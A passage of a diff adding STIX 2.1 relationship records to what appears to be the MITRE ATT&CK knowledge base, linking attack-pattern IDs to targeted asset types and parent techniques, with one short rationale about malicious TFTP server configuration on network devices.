"identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4fc8d585-f15d-49e9-9569-6aad9e9d9e52", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4fcc0674-fe6d-4977-9259-1832282a3997", + "created": "2020-03-16T15:48:34.214Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada", + "target_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4fd1a257-6b0b-4676-9195-ff8d0c3d2bd7", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4fd590d2-21ee-4188-92ef-25188a094a5d", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e49ee9d2-0d98-44ef-85e5-5d3100065744", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4fd63ec9-e2ad-4473-b9ed-90d7dfe378e8", + "created": "2020-01-24T14:33:05.871Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--9b99b83a-1aac-4e29-b975-b374950551a3", + "target_ref": "attack-pattern--70e52b04-2a0c-4cea-9d18-7149f1df9dc5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4fd6854b-6caa-4cc2-b54a-a97530bf0fd7", + "created": "2022-05-27T14:30:02.047Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-05-27T14:30:02.047Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--3d52e51e-f6db-4719-813c-48002a99f43a", + "target_ref": "attack-pattern--81033c3b-16a4-46e4-8fed-9b030dd03c4a", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4fd99e09-2473-4bc1-92fd-6bf17bed8ee5", + "created": "2021-03-17T20:35:08.459Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--84ae8255-b4f4-4237-b5c5-e717405a9701", + "target_ref": "attack-pattern--84771bc3-f6a0-403e-b144-01af70e5fda0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4fe2a51c-a13d-4070-ad07-8df02ee70f34", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4fec497b-eda1-4a43-a192-b83eaf0d534d", + "created": "2024-05-22T17:09:07.908Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T02:08:23.688Z", + "description": "Asset Mapping Rationale: Adversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with Modify System Image to load a modified image on device startup or reset.", + "relationship_type": "targets", + "source_ref": "attack-pattern--28abec6c-4443-4b03-8206-07f2e264a6b4", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--500089b1-8879-4bc6-affd-dcb2a851e675", + "created": "2024-06-21T14:12:20.270Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.270Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4933e63b-9b77-476e-ab29-761bc5b7d15a", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--50210b50-23cd-4249-9460-de1a6dc562d9", + "created": "2024-06-21T14:12:20.277Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.277Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--503c5256-b611-437e-a4ef-2ee1fd20ab29", + "created": "2023-09-29T18:03:06.209Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:03:06.209Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--505cb238-11ca-4409-b008-6aa808d2ec2d", + "created": "2020-10-02T15:47:10.227Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea", + "target_ref": "attack-pattern--9d48cab2-7929-4812-ad22-f536665f0109", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--506a3444-32fe-499b-bac2-00df24e85c77", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5071c70a-5aa8-4534-8cc4-676192728151", + "created": "2020-02-11T18:25:28.308Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541", + "target_ref": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--50831ce4-39aa-4c07-9013-7e5d31e1e72e", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--508baa77-4d34-45d3-81c1-c69027b56515", + "created": "2024-06-26T15:01:53.240Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:01:53.240Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--508dfa9b-e98a-4fb7-a34b-b74a3a7446d9", + "created": "2020-03-14T22:24:22.085Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7", + "target_ref": "attack-pattern--830c9528-df21-472c-8c14-a036bf17d665", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--50afe16b-9b3e-4325-8193-b373b7d3b39f", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--50b3dfed-cd84-424c-9bdd-8c5bbc78699f", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--50c34d3b-edf0-4194-91dc-652cdf3a40de", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--50d97114-3326-49a5-85cf-517acc819dcb", + "created": "2024-06-21T14:12:20.267Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.267Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--50dea2f5-86ac-4786-b118-d67da0fa1a03", + "created": "2020-01-24T17:57:51.455Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--6be14413-578e-46c1-8304-310762b3ecd5", + "target_ref": "attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--50e08869-1198-4b0e-b576-abdb55fb9b93", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f7c0689c-4dbd-489b-81be-7cb7c7079ade", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--50f7cf2f-2120-43e1-9636-5ce7ce5928a4", + "created": "2024-06-21T14:12:20.276Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.276Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--50f9a856-ece5-4909-b1e8-e2396ef6a4ad", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--51a14c76-dd3b-440b-9c20-2bf91d25a814", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--51194570-630f-4d23-ab45-234a0f048b94", + "created": "2019-12-03T14:25:00.678Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c", + "target_ref": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5131c799-517c-4bad-ba97-46ad7de956e7", + "created": "2023-09-28T21:17:06.233Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:17:06.233Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--513c33a6-4818-4cb2-8a3f-77bb76f3920f", + "created": "2024-06-21T14:12:20.269Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.269Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--51414bc3-20c2-4933-b1e7-2c28a5ed43a4", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4061e78c-1284-44b4-9116-73e4ac3912f7", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--515f9209-406b-4850-b65c-2308fbae4b1a", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--51654306-4cb3-4a9d-88a5-58ad02d02a20", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d40239b3-05ff-46d8-9bdd-b46d13463ef9", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--51ac40f6-8cc1-48cb-89cf-8b08b336b262", + "created": "2024-06-21T14:12:20.261Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.261Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ae676644-d2d2-41b7-af7e-9bed1b55898c", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--51b34e7c-2eb4-4853-91cf-3ca6b990f425", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--51d6fe28-39a2-4775-a146-1a062be1ce9c", + "created": "2024-06-21T14:12:20.257Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.257Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--51e28086-8aaf-4ab6-96d8-7c2f4ada7807", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--51ef38fc-dedc-4bbe-9534-f2d7b825a3a8", + "created": "2024-06-27T09:24:46.856Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:24:46.856Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ca00366b-83a1-4c7b-a0ce-8ff950a7c87f", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--51fe64af-9657-44d8-b04e-29ba47fc3c7c", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--74d2a63f-3c7b-4852-92da-02d8fbab16da", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": 